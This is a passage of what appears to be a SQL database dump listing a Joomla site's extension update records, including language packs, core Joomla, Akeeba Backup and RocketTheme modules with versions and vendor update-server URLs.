Unitag','','pkg_ar-AA','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(28052,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(28053,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(28054,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(28055,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(28056,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(28057,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(28058,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(28059,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(28060,3,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(28061,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(28062,3,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'3.9.24.2','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(28063,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(28064,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(28065,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(28066,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(28067,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(28068,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(28069,3,0,'English US','','pkg_en-US','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(28070,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(28071,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(28072,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(28073,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(28074,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(28075,3,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(28076,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(28077,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(28078,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(28079,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(28080,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(28081,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(28082,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(28083,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(28084,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(28085,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(28086,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(28087,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(28088,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(28089,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(28090,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(28091,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(28092,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(28093,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(28094,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(28095,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28096,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(28097,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(28098,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(28099,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(28100,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(28101,20,0,'RokGallery','','','component','',0,'2.46','0802','http://updates.rockettheme.com/joomla/313/1985305838','',''),(28102,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(28103,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(28104,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(28105,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(28106,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(28107,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(28108,57,0,'French','','pkg_fr-FR','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(28109,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(28110,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(28111,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(28112,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(28113,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(28114,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(28115,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(28116,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(28117,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(28118,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(28119,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(28120,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(28121,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(28122,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(28123,57,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(28124,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(28125,57,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'3.9.24.2','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(28126,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(28127,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(28128,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(28129,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(28130,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(28131,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(28132,57,0,'English US','','pkg_en-US','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(28133,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(28134,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(28135,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(28136,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(28137,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(28138,57,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(28139,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(28140,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(28141,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(28142,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(28143,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(28144,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(28145,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(28146,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(28147,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(28148,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(28149,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(28150,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(28151,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(28152,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(28153,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(28154,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(28155,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(28156,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(28157,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(28158,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-3.html',''),(28159,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.4.3FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer/features',''),(28160,122,0,'Google Structured Data Free','Google Structured Data Free','gsd','plugin','system',0,'4.8.6','','https://static.tassos.gr/update/gsdfree?type=.xml','\n			https://www.tassos.gr/releases/google-structured-data-markup/google-structured-data-markup-4-8-6			\n		',''),(28161,129,0,'JCE 2.9.4','Installation package for Joomla! 3.x and 4.x','pkg_jce','package','',0,'2.9.4','','https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml','https://www.joomlacontenteditor.net/news/jce-pro-2-9-4-released',''),(28162,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28163,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28164,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-3.html',''),(28165,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28166,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28167,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28168,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-3.html',''),(28169,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28170,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28171,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28172,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-3.html',''),(28173,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28174,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28175,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28176,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-3.html',''),(28177,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28178,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28179,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28180,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28181,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-3.html',''),(28182,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28183,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28184,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28185,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-3.html',''),(28186,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28187,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28188,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28189,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-3.html',''),(28190,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28191,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28192,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28193,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-3.html',''),(28194,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28195,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28196,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28197,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-3.html',''),(28198,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28199,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28200,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-3.html',''),(28201,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28202,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28203,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-3.html',''),(28204,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28205,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28206,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28207,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-3.html',''),(28208,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28209,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28210,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28211,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-3.html',''),(28212,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28213,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28214,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28215,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-3.html',''),(28216,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28217,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28218,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28219,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-3.html',''),(28220,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28221,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28222,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28223,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28224,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-3.html',''),(28225,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28226,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28227,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-3.html',''),(28228,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28229,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28230,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28231,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28232,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-4.html',''),(28233,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28234,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28235,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28236,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-4.html',''),(28237,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28238,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(28239,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(28240,3,0,'French','','pkg_fr-FR','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(28241,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(28242,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(28243,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(28244,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(28245,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(28246,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(28247,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(28248,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(28249,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(28250,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(28251,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(28252,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(28253,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(28254,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(28255,3,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(28256,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(28257,3,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(28258,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(28259,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(28260,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(28261,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(28262,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(28263,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(28264,3,0,'English 